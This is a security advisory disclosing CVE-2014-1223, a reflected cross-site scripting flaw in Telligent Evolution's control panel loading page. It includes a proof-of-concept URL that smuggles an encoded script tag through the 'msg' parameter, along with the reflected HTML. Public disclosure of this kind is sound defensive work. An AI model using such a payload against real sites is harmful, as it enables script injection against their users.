Vulnerability title: Cross-site Scripting in Telligent Evolution CVE: CVE-2014-1223 Vendor: Telligent Product: Evolution Affected version: 7.5.0.32466 Fixed version: 7.6.7.36651 Reported by: Jerzy Kramarz Details: It is possible for an attacker to inject JavaScript by manipulating the 'msg' parameter such that the JavaScript from the manipulated request is returned in the response. The following is an example URL which would trigger this vulnerability: http://host/controlpanel/loading.aspx?msg=1238c696%253cscript%253ealert%25281%2529%253c%252fscript%253e35c38a5e263 The above URL would produce the following source code returned to the user: <div class="CommonContentArea"> <div class="CommonContent"> <table cellspacing="0" cellpadding="4" border="0"> <tr> <td><img src="/community/utility/spinner.gif" width="16" height="16" border="0"></td> <td>1238c696<script>alert(1)</script>35c38a5e263</td> </tr> </table> </div> </div> </p> Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1223/ Copyright: Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.